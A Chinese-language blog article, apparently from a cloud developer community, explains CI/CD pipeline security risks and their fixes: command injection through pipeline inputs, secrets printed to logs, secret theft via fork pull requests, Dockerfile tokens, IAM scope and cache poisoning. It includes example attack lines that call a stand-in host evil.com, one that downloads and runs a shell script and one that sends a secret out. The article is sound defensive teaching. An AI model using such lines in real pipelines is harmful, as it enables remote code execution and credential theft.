# **CI/CD 不是自动化，是“自动暴露风险”？聊聊流水线安全那些你踩过却没意识到的坑**

---

说句扎心的实话：

现在很多团队的 CI/CD，不是提效工具，而是**漏洞放大器**。

你本来只有一个服务能被攻击，
结果一条流水线，把：

* Git 仓库
* 构建环境
* 云账号
* 生产集群

全都串在了一起。

一旦被打穿——
👉 恭喜，直接“打包送走全家桶”。

今天咱就聊两个最容易被忽视、但最致命的问题：

👉 **pipeline injection（流水线注入）**
👉 **凭证泄露（credential leakage）**

我不讲教科书，就讲真实场景 + 怎么防。

---

# 一、最隐蔽的攻击：你以为是参数，其实是命令

很多人写 pipeline，习惯这么搞：

```yaml
steps:
  - name: build
    run: |
      docker build -t myapp:${{ github.event.inputs.tag }} .
```

表面上看：

👉 用户传个 tag，很正常

但如果攻击者传的是：

```bash
v1.0; curl evil.com/shell.sh | bash
```

那最终执行变成：

```bash
docker build -t myapp:v1.0; curl evil.com/shell.sh | bash .
```

👉 **直接命令注入成功**

这就是典型的：

👉 pipeline injection

---

## 正确姿势：不要相信任何输入

你要做的是“白名单 + 转义”，而不是“直接拼”。

### 方法一：严格校验

```bash
if [[ ! "$TAG" =~ ^[a-zA-Z0-9._-]+$ ]]; then
  echo "Invalid tag"
  exit 1
fi
```

---

### 方法二：不要用 shell 拼接

改成参数传递：

```yaml
run: |
  docker build -t "myapp:${TAG}" .
```

👉 注意双引号，防止分号解析

---

# 二、你以为凭证是安全的，其实早就被打印出去了

这是我见过最多的事故类型。

比如：

```yaml
env:
  AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}

steps:
  - run: env
```

👉 恭喜你：

**密钥直接出现在日志里了**

---

## 更隐蔽一点的：

```bash
echo "Deploy with key: $AWS_SECRET_ACCESS_KEY"
```

👉 CI 日志：

永久保存 + 所有人可见

---

## 正确姿势：凭证要“最小暴露”

### 方法一：用平台内置 masking

比如 GitHub Actions 自动 mask：

```yaml
echo "::add-mask::$AWS_SECRET_ACCESS_KEY"
```

---

### 方法二：只在需要的步骤注入

```yaml
steps:
  - name: deploy
    env:
      AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
    run: deploy.sh
```

👉 不要全局 env

---

### 方法三：避免 echo / debug 打印

很多人喜欢：

```bash
set -x
```

👉 这玩意会打印所有命令（包括密钥）

👉 生产环境：

**必须禁用**

---

# 三、最容易被忽视的一点：PR 也能打你

很多团队开了：

👉 fork PR 自动触发 pipeline

这其实是个大坑。

攻击方式：

1. 提交恶意 PR
2. 修改 pipeline
3. 窃取 secrets

---

## 真实例子：

```yaml
- run: curl evil.com?key=$SECRET
```

只要 CI 在 PR 上跑：

👉 secrets 就被偷走了

---

## 正确做法：隔离信任边界

### GitHub Actions：

```yaml
on:
  pull_request:
    types: [opened, synchronize]

jobs:
  build:
    if: github.event.pull_request.head.repo.full_name == github.repository
```

👉 只允许“同仓库 PR”使用 secrets

---

# 四、容器构建阶段：你以为安全，其实已经被埋雷

Dockerfile 也是攻击面。

## 错误示范：

```dockerfile
ARG TOKEN
RUN git clone https://$TOKEN@github.com/private/repo.git
```

👉 问题：

* TOKEN 会进入镜像层
* 可以被 docker history 查到

---

## 正确姿势：用 BuildKit secrets

```bash
DOCKER_BUILDKIT=1 docker build \
  --secret id=token,src=token.txt .
```

```dockerfile
RUN --mount=type=secret,id=token \
    git clone https://$(cat /run/secrets/token)@github.com/private/repo.git
```

👉 优势：

* 不进入镜像层
* 构建后自动销毁

---

# 五、权限控制：别让 CI 拥有“上帝视角”

很多公司默认：

👉 CI 拥有全部权限

比如：

* 可以删除生产资源
* 可以访问所有云账号

这就是：

👉 **最危险的设计**

---

## 正确做法：最小权限原则（IAM）

比如 AWS：

```json
{
  "Effect": "Allow",
  "Action": [
    "s3:PutObject"
  ],
  "Resource": "arn:aws:s3:::my-bucket/*"
}
```

👉 CI 只做一件事：

上传文件

---

# 六、再说一个很多人没意识到的坑：缓存污染

CI 常用缓存：

```yaml
- uses: actions/cache@v3
```

但如果 key 可控：

```yaml
key: ${{ github.ref }}
```

👉 攻击者可以：

* 写入恶意缓存
* 下次构建被复用

---

## 正确姿势：

```yaml
key: build-${{ hashFiles('**/package-lock.json') }}
```

👉 缓存绑定内容，而不是输入

---

# 七、我自己的一个“踩坑总结”

说点真心话。

我以前也觉得：

👉 “流水线只是自动化，不是安全边界”

后来踩过一次事故：

* CI 被注入命令
* 拿到云密钥
* 直接删资源

那一刻你会明白：

👉 **CI/CD 本质是“最高权限入口”**

因为它能：

* 读代码
* 用密钥
* 操控生产

它比任何一个服务都“危险”。

---

# 八、给你一套实战 Checklist（建议收藏）

上线前，过一遍：

### pipeline injection 防护

* [ ] 所有输入做白名单校验
* [ ] 不拼接 shell 命令
* [ ] 使用参数化调用

---

### 凭证安全

* [ ] 不打印 secrets
* [ ] 不全局 env
* [ ] 使用 masking
* [ ] 禁用 set -x

---

### PR 安全

* [ ] fork PR 不使用 secrets
* [ ] pipeline 修改需要 review

---

### 构建安全

* [ ] 不在 Dockerfile 写明文 token
* [ ] 使用 BuildKit secret

---

### 权限控制

* [ ] CI 使用最小权限
* [ ] 不使用 root / admin

---

# 结尾

很多团队天天在做：

👉 安全扫描
👉 漏洞修复

但却忽略了一个最致命的地方：

👉 **流水线**

你可以有再强的防火墙，
但只要 CI 被打穿——

👉 一切都是“内网操作”。

所以我一直说一句话：

👉 **CI/CD 不是效率工具，它是你系统的“总闸门”。**

门开着，谁都能进。



👉 pipeline injection（流水线注入）👉 凭证泄露（credential leakage）

CI/CD 不是自动化，是“自动暴露风险”？聊聊流水线安全那些你踩过却没意识到的坑

安全

运维

职业发展

CI/CD流水线安全不容忽视！本文揭露两大高危漏洞：流水线注入攻击和凭证泄露风险，教你如何防范恶意参数注入、避免密钥打印到日志、隔离PR权限、安全使用Dockerfile构建。掌握最小权限原则和BuildKit机密管理，让CI/CD从漏洞放大器变成真正的安全防线。

漏洞修复

防火墙

容器

2026新春采购季

文章

问答

视频

教程

学习中心

腾讯云实验室

直播

竞赛

腾讯云代码分析专区

腾讯iOA零信任安全管理系统专区

腾讯云架构师技术同盟交流圈

腾讯云数据库专区

腾讯云智能顾问专区

腾讯云原生专区

腾讯混元专区

腾讯云TCE专区

腾讯云Lighthouse专区

腾讯云HAI专区

腾讯云Edgeone专区

腾讯云存储专区

腾讯云智能专区

腾讯轻联专区 

腾讯云开发专区

TAPD专区

腾讯轻量云游戏服专区

腾讯云最具价值专家

腾讯云架构师技术同盟

腾讯云创作之星

腾讯云开发者先锋

腾讯云AI代码助手

云原生构建

TAPD 敏捷项目管理

Cloud Studio

SDK中心

API中心

命令行工具

功能1上新10个字符

功能2描述100个字符功能2描述100个字符功能2描述100个字符功能2描述100个字符功能2描述100个字符功能2描述100个字符功能2描述100个字符功能2描述100个字符功能2描述100个字符。

功能2上新100个字符功能2上新100个字符功能2上新100个字符功能2上新100个字符功能2上新100个字符功能2上新100个字符功能2上新100个字符功能2上新100个字符功能2上新100个字符。

功能5描述100个字符功能5描述100个字符功能5描述100个字符功能5描述100个字符功能5描述100个字符功能5描述100个字符

功能5上新100个字符功能5上新100个字符功能5上新100个字符功能5上新100个字符功能5上新100个字符功能5上新100个字符功能5上新100个字符功能5上新100个字符功能5上新100个字符功能5上新100个字符

功能4上新

文章&问答评论现已支持表情

全新交互，全新视觉，新增快捷键、悬浮工具栏、高亮块等功能并同时优化现有功能，全面提升创作效率和体验

社区富文本编辑器全新改版！诚邀体验～ 

精选全网热门MCP server，让你的AI更好用 🚀

💥开发者 MCP广场重磅上线！

涵盖代码开发、场景应用、自动测试全流程，助你从零构建专属AI助手

一站式MCP教程库，解锁AI应用新玩法

聚焦“写作效率、视觉美观与运行性能”三方面进行全面升级，为您提供更高效、稳定的创作环境

社区富文本&Markdown编辑器全新改版上线，欢迎大家体验!

诚挚邀请您参与本次调研，分享您的真实使用感受与建议。您的反馈至关重要，感谢您的支持与参与！

社区新版编辑器体验调研

CI/CD 不是自动化，是“自动暴露风险”？聊聊流水线安全那些你踩过却没意识到的坑-腾讯云开发者社区-腾讯云

CI/CD 不是自动化，是“自动暴露风险”？聊聊流水线安全那些你踩过却没意识到的坑

CI/CD 不是自动化，是“自动暴露风险”？聊聊流水线安全那些你踩过却没意识到的坑

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐